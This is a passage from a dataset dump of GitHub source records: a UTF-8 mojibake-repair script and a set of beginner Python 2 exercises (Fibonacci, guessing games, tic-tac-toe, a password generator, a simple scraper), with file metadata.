save_to:\n data.to_csv(ROOT + save_to, float_format=\"%g\")\n\n return df\n else:\n raise ValueError(\"query returned no data\")\n\n\ndef fetch_cod(formulas=None, ids=None, get_ids_for=None):\n \"\"\"Fetch data from the Crystallography Open Database (COD).\n Docs at https://pymatgen.org/pymatgen.ext.cod.\n Needs the mysql binary to be in path to run queries. Installable\n via `brew install mysql`.\n \"\"\"\n cod = COD()\n if formulas:\n return [cod.get_structure_by_formula(f) for f in formulas]\n if ids:\n return [cod.get_structure_by_id(i) for i in ids]\n if get_ids_for:\n return [cod.get_cod_ids(i) for i in get_ids_for]\n raise ValueError(\"fetch_cod() requires formulas or ids.\")\n"
}
] | 8 |
elianmarks/utf8-debug | https://github.com/elianmarks/utf8-debug | 049928541c3802472de3f82f18149bdc72c6e2b7 | b19c8b7ee326beb2d16737397cc2654700110e72 | 5ff0cc56d1957232bca68c3c82c56dc1c0fa6bec | refs/heads/master | 2020-04-29T06:02:22.420817 | 2019-03-15T23:17:26 | 2019-03-15T23:17:26 | 175,903,083 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.39370712637901306,
"alphanum_fraction": 0.4134731888771057,
"avg_line_length": 37.13846206665039,
"blob_id": "5aaba1c2240f1fa31810adb8db8681c8ce3e5057",
"content_id": "07c7f2f8bb5ff51589d4b0bffb846be9eae124f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3175,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 65,
"path": "/utf8-debug.py",
"repo_name": "elianmarks/utf8-debug",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n#!/usr/bin/env python2.7\n#\n#contributor for script\n#https://github.com/ttttian/python-latin1-to-utf8/blob/master/latin1_to_utf8.py\n#\nimport re\nimport sys\nimport os\n\nregexDict = {\n'€':'€','‚':'‚','„':'„','…':'…','‡':'‡',\n'‰':'‰','‹':'‹','‘':'‘','’':'’','“':'“',\n'•':'•','–':'–','—':'—','â„¢':'™','›':'›',\n'Æ’':'ƒ','ˆ':'ˆ','Å’':'Œ','Ž':'Ž','Ëœ':'˜','Å¡':'š',\n'Å“':'œ','ž':'ž','Ÿ':'Ÿ','¡':'¡','¢':'¢','£':'£',\n'¤':'¤','Â¥':'¥','¦':'¦','§':'§','¨':'¨','©':'©',\n'ª':'ª','«':'«','¬':'¬','Â' :'','®':'®','¯':'¯',\n'°':'°','±':'±','²':'²','³':'³','´':'´','µ':'µ',\n'¶':'¶','·':'·','¸':'¸','¹':'¹','º':'º','»':'»',\n'¼':'¼','½':'½','¾':'¾','¿':'¿','À':'À','Â':'Â',\n'Ã':'Ã','Ä':'Ä','Ã…':'Å','Æ':'Æ','Ç':'Ç','È':'È',\n'É':'É','Ê':'Ê','Ë':'Ë','ÃŒ':'Ì','ÃŽ':'Î','Ñ':'Ñ',\n'Ã’':'Ò','Ó':'Ó','Ô':'Ô','Õ':'Õ','Ö':'Ö','×':'×',\n'Ø':'Ø','Ù':'Ù','Ú':'Ú','Û':'Û','Ü':'Ü','Þ':'Þ',\n'ß':'ß','á':'á','â':'â','ã':'ã','ä':'ä','Ã¥':'å',\n'æ':'æ','ç':'ç','è':'è','é':'é','ê':'ê','ë':'ë',\n'ì':'ì','Ã' :'í','î':'î','ï':'ï','ð':'ð','ñ':'ñ',\n'ò':'ò','ó':'ó','ô':'ô','õ':'õ','ö':'ö','÷':'÷',\n'ø':'ø','ù':'ù','ú':'ú','û':'û','ü':'ü','ý':'ý',\n'þ':'þ','ÿ':'ÿ','Å' :'Š','Â' :'',\n}\n\nregex = r'€|‚|„|…|‡|‰|‹|‘|’|“|•|–|—|â„¢|›|Æ’|ˆ|Å’|Ž|Ëœ|\\\nÅ¡|Å“|ž|Ÿ|¡|¢|£|¤|Â¥|¦|§|¨|©|ª|«|¬|Â|®|¯|°|±|²|³|´|µ|¶|·|¸|¹|\\\nº|»|¼|½|¾|¿|À|Â|Ã|Ä|Ã…|Æ|Ç|È|É|Ê|Ë|ÃŒ|ÃŽ|Ñ|Ã’|Ó|Ô|Õ|Ö|×|Ø|Ù|Ú|\\\nÛ|Ü|Þ|ß|á|â|ã|ä|Ã¥|æ|ç|è|é|ê|ë|ì|Ã|î|ï|ð|ñ|ò|ó|ô|õ|ö|÷|ø|ù|ú|û|ü|ý|þ|ÿ|Å|Â'\n\ndef regexReplace(stringValue):\n newLine = stringValue\n match = re.findall(regex, newLine)\n if not match:\n return newLine\n for characterInvalid in match:\n newLine = re.sub(characterInvalid, regexDict[characterInvalid], newLine)\n return newLine\n\nif len(sys.argv) < 1:\n print(\"Informe o arquivo que será tratado como paramêtro!\")\n exit(1)\nelse:\n filePath = sys.argv[1]\n newFile = \"new_\" + str(filePath.split(\"/\")[-1])\n if os.path.exists(filePath):\n #open file\n file = open(sys.argv[1], \"r\")\n newFile = open(newFile, \"w\")\n for line in file.readlines():\n newFile.write(regexReplace(line))\n file.close()\n newFile.close()\n print(\"Foi gerado o arquivo %s!\" %newFile)\n else:\n print(\"Arquivo não existe!\")\n exit(2)\n"
}
] | 1 |
vogd/pythontasks | https://github.com/vogd/pythontasks | 6a8512b33d566f538a6a1752f4ef0d44f51fe224 | 4e925df9abdfe98b1a44f1ca5a19bfee03edec8c | ec46971bb57702f0f60f85664fb0cde94bce0e3f | refs/heads/master | 2020-04-02T18:48:56.129800 | 2019-01-03T21:19:45 | 2019-01-03T21:19:45 | 154,713,952 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.568493127822876,
"alphanum_fraction": 0.6369863152503967,
"avg_line_length": 28,
"blob_id": "29f113edbc2c2bfc3e80b3a35bc26838c1882f71",
"content_id": "86aba9e5360eef08902e5cd4278c920438ed3aa2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 5,
"path": "/task13_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "num=int(raw_input(\"Enter amount of fibo items : \"))\nlist1=[1,1]\nfor i in range(1,(num-1)):\n list1.append(list1[i]+list1[i-1])\n print list1\n\n"
},
{
"alpha_fraction": 0.6539624929428101,
"alphanum_fraction": 0.6642467975616455,
"avg_line_length": 30.188678741455078,
"blob_id": "45e4c2f7c807701dcfdda18d43e6d3292cb7c805",
"content_id": "f8db757e239ace5a677f75d91f35f171f001010a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1653,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 53,
"path": "/task20.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\nsortedl=[]\nmylist=[]\niteration=0\ni=17\nn=0 \ntrueval=0\n\ndef generatelist(iteration,i):\n iteration=iteration+1\n print (\"Iteration \" + str(iteration))\n mylist=random.sample(range(50),10)\n mylist == mylist.sort()\n print (mylist)\n checklistbinary(mylist,iteration,i)\n#checklist(mylist,iteration)\n\n#def checklist(mylist,iteration):\n# if (i in mylist):\n# print (\"Hurray \" + str(i) + \" is a part of the list ! \" + str(mylist))\n# raise SystemExit\n# else:\n# generatelist(iteration) \n\ndef checklistbinary(mylist,iteration,i):\n compare=len(mylist)\n compare = int(compare/2)\n for n in xrange(0,len(mylist)-1):\n print (\"Starting division from list itemID \"+str(compare))\n if int(mylist[compare])>i:\n print (\"ItemID \"+str(compare)+ \" is: \"+str(mylist[compare])+\" > \" + str(i))\n compare = compare-n\n #print(compare)\n trueval=1\n elif int(mylist[compare])==i:\n print (\"ItemID \" +str(compare)+\" is: \" + str(mylist[compare])+ \" = \" + str(i)) \n print (\"Item found in the list. Exiting..\")\n raise SystemExit\n elif int(mylist[compare])<i:\n #print(compare) \n print (\"Item \"+str(compare)+ \"is: \" +str(mylist[compare])+\" < \" + str(i))\n compare = compare+n\n print (\"Next List item index is \" +str(compare))\n compare = int(compare/2)\n trueval=0\n if trueval==1:\n print (\"Value is withing the list range, but there is no direct match\") \n print (\"Startig new interaction unless the list will have direct match\")\n generatelist(iteration,i)\n else:\n print (\"Value is not withing the list. Starting new iteration unless item will be found..\")\n generatelist(iteration,i)\ngeneratelist(iteration,i)\n"
},
{
"alpha_fraction": 0.5373134613037109,
"alphanum_fraction": 0.5717566013336182,
"avg_line_length": 31.148147583007812,
"blob_id": "a7cb350f5365007710cc9012bbabae7fea8133f0",
"content_id": "5f26a514ad6d50ba7afc45c743e319e1bc296bb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 27,
"path": "/task8.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\nflag = 1\nchoice = ['empty','rock','paper','scissors']\n\nwhile flag > 0:\n usr_command = raw_input(\"Hit Enter to Start Game\")\n \n usr_name1 = raw_input(\"Enter User1 name : \")\n m1 = int(raw_input(\" enter choice 1-rock, 2-paper, 3-scissors: \"))\n if m1 not in range (1,4):\n print(\"Error numeric values from 1 to 3 only\")\n else: \n \n usr_name2 = raw_input(\"Enter User2 name : \")\n m2 = int(raw_input(\" enter choice 1-rock, 2-paper, 3-scissors: \"))\n if m2 not in range (1,4):\n print(\"Enter numeric values from 1 to 3 only\")\n else: \n game = int(random.randint(1,3))\n print (game)\n if choice[m1] == choice[game]:\n print (\"Winner is User1 \" + choice[game])\n else:\n if choice[m2] == choice[game]:\n print (\"Winner is User2 \" + choice[game])\n else:\n print (\"its a draw..\") \n"
},
{
"alpha_fraction": 0.5986914038658142,
"alphanum_fraction": 0.6532170176506042,
"avg_line_length": 19.377777099609375,
"blob_id": "c31438c3f0fc9f575672f9ee9772c5e47f751e31",
"content_id": "f9989cdd252dd9623a2386662035f4a7f2acdaf2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 917,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 45,
"path": "/task26.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "#import random\nfrom random import randrange\nn=0\nlist1=[]\nlist2=[]\nlist3=[]\n\n\ndef generatelist(listname):\n n=0\n while n<=2:\n listname.append(randrange(0,3))\n n+=1\n print listname\n\ndef main():\n list1=[]\n list2=[]\n list3=[]\n generatelist(list1)\n generatelist(list2)\n generatelist(list3)\n checkwinner(list1,list2,list3)\n\ndef checkwinner(list1,list2,list3): \n print \"\"\n n=0 \n while n <=2:\n# print \"list1 item \"+str(n) + \" = \"+str(list1[n])\n# print \"list2 item \"+str(n) + \" = \"+str(list2[n])\n# print \"list3 item \"+str(n) + \" = \"+str(list3[n])\n if list1[n]==list2[n] and list2[n]==list3[n]:\n print \"player won by horizontal\" \n raise SystemExit\n n+=1 \n if list1[0]==list2[1] and list2[1]==list3[2]:\n print \"player won by diagonal from left to right\"\n raise SystemExit\n if list3[0]==list2[1] and list2[1]==list1[2]:\n print \"player won by diagonal from right to left\"\n raise SystemExit\n else:\n main() \n\nmain()\n"
},
{
"alpha_fraction": 0.6574172973632812,
"alphanum_fraction": 0.6905016303062439,
"avg_line_length": 26.5,
"blob_id": "d7801b066f5e14f900e46fddf8f64b7de371623c",
"content_id": "bb4a8e4e40dd38036af4ee844649377d9a12a1f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 937,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 34,
"path": "/task1.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "\"\"\"TODO(ogolovatyi): DO NOT SUBMIT without one-line documentation for task1.\nMy task from https://www.practicepython.org/exercise/2014/01/29/01-character-input.html\nTODO(ogolovatyi): DO NOT SUBMIT without a detailed description of task1.\n\"\"\"\n\n#from __future__ import absolute_import\n#from __future__ import division\n#from __future__ import print_function\n\n#from absl import app\n#from absl import flags\n\n#tLAGS = flags.FLAGS\n\n\n#def main(argv):\n# if len(argv) > 1:\n# raise app.UsageError('Too many command-line arguments.')\n\n#if __name__ == '__main__':\n# app.run(main)\n\nname = raw_input(\"What is your Name: \")\nprint (\"your name is:\" +name)\nage = int(raw_input(\"Enter your age: \"))\nif age <100:\n age100 = int(100-age)\n print (\"you will reach 100 in \" +str(age100)+\" years.\")\nelse:\n print (\"Your age is already >100 years\")\n\nrepeat=int(raw_input(\"repeats number: \"))\nfor i in range(repeat):\n print (\"this is repeat number\"+str(i))\n\n\n"
},
{
"alpha_fraction": 0.6196581125259399,
"alphanum_fraction": 0.6410256624221802,
"avg_line_length": 16.923076629638672,
"blob_id": "0aabea03abfc674ab6ae98dc1a40965f5a7270fe",
"content_id": "6e47c819117e3b7862a9e75cb11d692a3f69f216",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 13,
"path": "/task11_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "def checkdigit(f):\n list1=range(2,f)\n print list1\n for i in list1:\n if f%i==0: \n return f\n\nd=int(raw_input(\"Enter digit :\"))\nresult=checkdigit(d)\nif result:\n print str(result)+\"-Is a Prime !!! \"\nelse:\n print str(d)+\"-Not a prime\"\n\n"
},
{
"alpha_fraction": 0.4589800536632538,
"alphanum_fraction": 0.521064281463623,
"avg_line_length": 21.049999237060547,
"blob_id": "bea6bf5f798a9211667b83c52d132178cb4518bd",
"content_id": "95cc193ad14b84ac4372aae4d1f82c79e7210cc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 20,
"path": "/task3.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "list = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nlist2 = []\nnum=int(raw_input(\"Enter any number :\"))\nfor x in list:\n if x < num:\n print (int(x))\n if x < 5:\n # print (\"x = \"+str(x)+\" which is less than 5\")\n list2.append(x) \n\nfor y in list2:\n print (str(y)+ \" list of items less than 5\")\n\n#squares = [1, 4, 9, 16]\n#sum = 0\n#for num in squares:\n# sum +=num\n#print sum\nfor item in reversed(list):\n print [item]\n \n\n\n\n"
},
{
"alpha_fraction": 0.5511627793312073,
"alphanum_fraction": 0.5930232405662537,
"avg_line_length": 24.294116973876953,
"blob_id": "c0d69fdde0bd3c9cd29a59e014e3826971b97e0c",
"content_id": "4f6f58895b4cf5ebce9d3a8d4cbe3c9431202d47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 17,
"path": "/task5.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\ncount1 = int(random.randint(4,8))\ncount2 = int(random.randint(4,8))\nprint (\"list1 length :\" +str(count1))\nprint (\"list2 length :\"+str(count2))\na=random.sample(range(1,10),int(count1))\nb=random.sample(range(1,10),int(count2))\n\nc=[]\nprint (str(a))+(str(b))\nfor x in a:\n if x in b:\n if x in c:\n print (\"Item \" + str(x)+ \" already in list. Skipping\")\n else: \n c.append(x)\nprint (c)\n"
},
{
"alpha_fraction": 0.6310782432556152,
"alphanum_fraction": 0.641649067401886,
"avg_line_length": 23.256410598754883,
"blob_id": "b5935a880df1db66aca6dcf98e151979558f9fe7",
"content_id": "ea93a9b05544faf0599a86942236d5185c7344d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 946,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 39,
"path": "/task16.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import string\nimport random\npolicy =\"\"\nsymbols=[]\n\ndef inputpolicy(policy):\n policy=int(raw_input (\"Enter 1 for strong password policy, 2 for weak policy : \"))\n checkvalue(policy,symbols) \n\ndef checkvalue(policy,symbols):\n if policy == 1: \n symbols=[]\n print (\"Weak password policy selected\")\n elif policy == 2:\n symbols=[\"@\",\"%\",\"&\",\"(\",\")\",\"#\",\"*\",\"^\",\"~\",\"+\"]\n print (\"Strong password policy selected\")\n else:\n print \"entered value must be 1 or 2\"\n inputpolicy(policy)\n#print str(symbols)\n\ninputpolicy(policy)\n\n\ndictionary=string.ascii_letters + string.digits + str(symbols)\n\nfrom os import urandom\n#chars = \"\".join([random.choice(string.letters) for i in xrange(15)])\nchars = \"\".join([random.choice(dictionary)for i in xrange(15)])\n\n#print (\" initial chars\", chars)\na=list(chars)\nfor i in a:\n if i == \"'\" or i == '\"' or i == \",\":\n# print \"will remove this : \" + str(i) \n a.remove(i)\n# print \"removed\"\n\nprint ''.join(a)\n"
},
{
"alpha_fraction": 0.6372881531715393,
"alphanum_fraction": 0.6474575996398926,
"avg_line_length": 16.294116973876953,
"blob_id": "f46dabf8b0c220ab44cdde0ea00cc165d2209738",
"content_id": "2c3c9823bb5b583199c801eb32226dd7fd2f79c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 295,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 17,
"path": "/task15.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "x=raw_input(str(\"enter words : \"))\nword_list =x.split (' ')\ni=0\n\ndef split_string(string):\n letters=list(string)\n letters.reverse()\n print letters\n\ndef reverse(list_a,i):\n while i <= len(list_a)-1: \n i=i+1\n string=list_a[-i]\n print string \n split_string(string) \n\nreverse(word_list,i)\n\n"
},
{
"alpha_fraction": 0.6164383292198181,
"alphanum_fraction": 0.6392694115638733,
"avg_line_length": 18.909090042114258,
"blob_id": "157d109cddef77bfa12a1eedbe504aa641693a9d",
"content_id": "1553bb4670794d3d724c1dd0351fa141b672b1e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 219,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 11,
"path": "/task13.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\nx=int(raw_input(\"How many fibonacci digits to store :\"))\nlist_d =[1,1]\n\ndef append(list_d,x):\n while len(list_d)<=x-1: \n d=int(list_d[-1]+list_d[-2])\n list_d.append(d)\n\nappend(list_d,x)\nprint (list_d)\n"
},
{
"alpha_fraction": 0.6570680737495422,
"alphanum_fraction": 0.6662303805351257,
"avg_line_length": 19.648649215698242,
"blob_id": "790aa6ec505bfb3a26d28a645d2e245f41f4fbb2",
"content_id": "331b3b15645aa0d7ea4396d341a8821bed39d138",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 764,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 37,
"path": "/task21.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import re\nimport requests\nimport subprocess\nimport os\nfrom bs4 import BeautifulSoup\nx=''\nitem=''\n\ndef inputname():\n x= str(raw_input(\"Enter filename to save : \"))\n x = os.getcwd()+\"/\"+x\n #print(x)\n download(x)\n\ndef striphtml(x,data):\n p = re.compile(r'<.*?>')\n text=p.sub('', data)\n writef(x,text)\n\ndef writef(filename, data):\n #print(filename) \n f = open(filename,'a')\n f.write(data)\n f.close\n\n\ndef download(x):\n base_url = 'https://www.vanityfair.com/style/society/2014/06/monica-lewinsky-humiliation-culture'\n r = requests.get(base_url)\n soup = BeautifulSoup(r.text,\"lxml\")\n for story_text in soup.findAll(['data-reactid=','p']):\n story_text=str(story_text)\n item==striphtml(x,story_text)\n #print (item)\n writef(x,str(item) + \"\\n\") \n\ninputname()\n"
},
{
"alpha_fraction": 0.692923903465271,
"alphanum_fraction": 0.6995994448661804,
"avg_line_length": 25.75,
"blob_id": "3f8305d05b0e9bb342761f8133026d323b3b8ab5",
"content_id": "1518416cbc064b5f9b5b2ce553be151ac60a4a50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 749,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 28,
"path": "/task30.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "# Download file and read random word from it\n#import os\n#os.system (\"wget -Nnc http://norvig.com/ngrams/sowpods.txt\")\n\ncounter=0\nuplimit=0\nimport os\nimport sys\nimport urllib\n\nurllib.urlretrieve(\"http://norvig.com/ngrams/sowpods.txt\", os.getcwd()+\"/sowpods.txt\")\n#print os.getcwd()\n#limit=int(os.popen(\"wc -l sowpods.txt | awk -F' ' '{print$1}'\").read())\n#print limit\n#sys.exit()\n\nwith open('sowpods.txt','r') as f:\n line=f.readline()\n while line:\n counter=int(counter+1) \n line=f.readline()\n print \"Total lines in file : \"+ str(counter)\n from random import *\n linetoread=randint(1,int(counter))\n print \"Need to print line number : \"+str(linetoread)\n line=open('sowpods.txt','r').readlines()[linetoread]\n print line\nprint \"All lines are read\"\n"
},
{
"alpha_fraction": 0.614689290523529,
"alphanum_fraction": 0.6316384077072144,
"avg_line_length": 20.071428298950195,
"blob_id": "f6599ef23c99018ad3ee50686b433bf9b576cfd3",
"content_id": "c6be7875ce6610a4e708a833bdff5ca03bcc6a54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 885,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 42,
"path": "/task18.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\n\ndef generatedigit():\n x= random.randint(0,9999)\n print x\n get_integer (\"Guess a 4 digit number \",x,cows,bulls)\n\ny=\"\"\ncows = 0\nbulls = 0\ninputl=[]\n\ndef get_integer(text,x,cows,bulls):\n while True:\n try:\n y=int(raw_input(text))\n inputl = list(str(y))\n if len(inputl)<4:\n print (\"Please, Enter 4 digit value\")\n elif len(inputl)>4:\n print (\"Please, Enter a 4 digit value\") \n # print (\"Y is \"+str(y))\n else:\n cowscheck(y,x,cows,bulls)\n except ValueError:\n print \"Oops! That was no valid number. Try again...\"\n\ndef cowscheck(y,x,cows,bulls):\n #print x\n #print y\n if x == y:\n cows = cows+1\n print (\"You guessed!!!!\")\n print (\"You have \"+str(cows)+\" cows.\")\n raise SystemExit\n else:\n bulls=bulls+1\n print (\"Boo\")\n print (\"You have \" + str(bulls) + \" bulls.\")\n get_integer(\"Guess a 4 digit number one more time :\",x,cows,bulls)\n\ngeneratedigit()\n"
},
{
"alpha_fraction": 0.5634328126907349,
"alphanum_fraction": 0.5932835936546326,
"avg_line_length": 13.833333015441895,
"blob_id": "69f2b3197181b57b60f2290caadeef27a9b04d74",
"content_id": "b5452016860424e96e8c25383786bf9fbc77c5ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 268,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 18,
"path": "/task14.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\n\na=random.sample(range(15),10)\nb=random.sample(range(15),10)\n \nprint a\nprint b\n\ndef remover(a,b):\n [b.remove(i) for i in b if i in a] \n [a.remove(z) for z in a if z in b]\n c=a+b\n printer(c)\n \ndef printer(x):\n print x\n \nremover(a,b)\n\n"
},
{
"alpha_fraction": 0.5918300747871399,
"alphanum_fraction": 0.6290849447250366,
"avg_line_length": 22.720930099487305,
"blob_id": "9d53ebe8bd3d29687eea1a6ab64d19e7ff118d03",
"content_id": "307dd4b7233a28cff0de9559087078345db4a1da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3060,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 129,
"path": "/task27_1.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "from random import randrange\n\nn=0\nk=0\nsymbol=0\ncoord=''\ncoordlist=[]\nlist1=[]\nlist2=[]\nlist3=[]\nwinner=0\n\ndef generatelist(listname):\n n=0\n while n<=2:\n listname.append(\"\")\n n+=1\n print listname\n\nplayer1=1\nplayer2=0\n\ndef checkmoves(list1,list2,list3):\n # Match lists and find if same position items in lists are the same (check by vertical)\n global k\n for k in list1:\n if k <> '':\n if k==0:\n winner=1 \n else: \n winner=2\n if k in list2 and k in list3:\n print \"Winner is player \"+ str(winner)+ \" !!!\"\n raise SystemExit\n\n# Check winner if All items in list1 are filled with values \n if len(set(list1))==1: \n print \"Winner is player \"+ str(winner)+ \" !!!\"\n raise SystemExit\n\n# Check winner if All items in list2 are filled with values\n for k in list2:\n if k <> '':\n if k==0:\n winner=1 \n else: \n winner=2\n if len(set(list2))==1: \n print \"Winner is player \"+ str(winner)+ \" !!!\"\n raise SystemExit\n\n# Check winner if All items in list3 are filled with values\n for k in list3: \n if k <> '':\n if k==0:\n winner=1 \n else: \n winner=2\n if len(set(list3))==1: \n print \"Winner is player \"+ str(winner)+ \" !!!\"\n raise SystemExit\n\n#Check winner by diagonal\n if list1[0]<>''and list2[1]<>'' and list3[2]<>'':\n if str(list1[0])==str(list2[1]) and str(list2[1])==str(list3[2]):\n if str(list1[0])=='1':\n print \"Winner is player2 !!!\"\n else:\n print \"Winner is player1 !!!\"\n if list3[0]<>'' and list2[1]<>'' and list1[2]<>'': \n if str(list3[0])==str(list2[1]) and str(list2[1])==str(list1[2]):\n if str(list3[0])=='1':\n print \"Winner is player2 !!!\"\n else:\n print \"Winner is player1 !!!\" \n \ndef readmove(player):\n coord=raw_input(\"Input player \"+str(player)+\" move coordinates x,y : \")\n coordlist=list(coord) \n x=(int(coordlist[0])-1)\n y=int(coordlist[2])\n if int(x)<0 or int(y)==0:\n print \"Please enter new coordinates for the move. Axis value can not be '0'\"\n readmove(player)\n else: \n if int(player)==1:\n symbol=0\n print \"Will call func to update list with '0'\"\n print \"symbol: \"+str(symbol)\n placemove(symbol,x,y,player)\n else:\n symbol=1\n print \"Will call func to update list with '1'\"\n print \"symbol: \"+str(symbol)\n placemove(symbol,x,y,player)\n\n\ndef listappend(symbol,listname,x,player):\n if listname[int(x)]<>0 and listname[int(x)]<>1:\n print \"appending \"+str(listname)\n listname[int(x)]=int(symbol)\n else:\n print \"please enter new coordinates, that slot is already used\"\n readmove(player)\n\ndef placemove(symbol,x,y,player):\n if int(y)==1:\n listappend(symbol,list1,x,player)\n elif int(y)==2:\n listappend(symbol,list2,x,player)\n elif int(y)==3:\n listappend(symbol,list3,x,player)\n else:\n print \"Enter Valid X cordinates from 1 to 3 one more time !!! : \"\n readmove(player)\n\n print list1\n print list2\n print list3\n\ngeneratelist(list1)\ngeneratelist(list2)\ngeneratelist(list3)\n\nwhile n<=3:\n readmove(1)\n checkmoves(list1,list2,list3)\n readmove(2)\n checkmoves(list1,list2,list3)\n"
},
{
"alpha_fraction": 0.6979166865348816,
"alphanum_fraction": 0.7063491940498352,
"avg_line_length": 41.8510627746582,
"blob_id": "6ce183acf5d385de1b54ec08d842d04984010b2c",
"content_id": "bd8d85b7c0b0c88e96db1346e6e473bbc803d6e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2016,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 47,
"path": "/task25.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\n\nguessedlist=[50]\n\nflag=0 \n\ndef generatenum(guessed,guessednew,guessedlist):\n n= int(len(guessedlist)-1) # because n> than actual item numbers since index starts from 0\n if int(guessed) < int(guessednew):\n print str(guessed)+\" < \"+ str(guessedlist[n-1]) \n print \"range to generate from \"+str(guessed)+\" to \"+str(guessednew)\n guessed =random.randrange(guessed,guessednew)\n else :\n print str(guessed)+ \" > \"+ str(guessednew)\n # if the next guessed < than your num\n print \"range to generate from \"+str(guessednew)+\" to \"+str(guessed)\n guessed =random.randrange(guessednew,guessed)\n print (\"Guessed generated \"+str(guessed))\n guessnum (\"Enter 'o' if guessed 'y' if the number is bigger than your guessed and 'n' if not: \",guessed)\ndef guessnum(text,guessed):\n global flag\n print guessed\n confirmation = str(raw_input(text))\n flag==0\n while (flag==0):\n if confirmation ==\"o\":\n print (\"Congrats! You have guessed the number !!!!\")\n guessedlist.append(guessed)\n print (\"We have used \" + str(len(guessedlist))+ \" attempts to guess your number.\")\n flag==1\n raise SystemExit\n elif confirmation==\"y\":\n guessedlist.append(guessed)\n guessednew=abs(guessed-(guessed/2))\n print \"next number range is up to \"+str(abs(guessed-(guessed/2)))\n print \"Failed attempts so far \" + str(len(guessedlist))\n while guessed>0:\n generatenum(guessed,guessednew,guessedlist) # if the newlygeneratednum depending on customer input is bigger/or smaller we need to generate from smaller numbers array then\n else:\n guessedlist.append(guessed)\n guessednew=abs(guessed+(guessed/2))\n print \"next number range is up to \"+str(guessed)\n print \"Failed attempts so far \" + str(len(guessedlist))\n generatenum(guessed,guessednew,guessedlist) # if the num is smaller , then we need to generate from between last bigger numbers array and currently generated\n\n\nguessnum(\"Enter 'o' if guessed 'y' if the number is bigger than your guessed and 'n' if not: \",100/2)\n\n\n"
},
{
"alpha_fraction": 0.6246334314346313,
"alphanum_fraction": 0.6392961740493774,
"avg_line_length": 16,
"blob_id": "be31b8c220711141bf895cf2d2f73033668d59bb",
"content_id": "ebf9e405f62e52ac2dcfeab2ca790a9a525bfb4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 341,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 20,
"path": "/task6.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
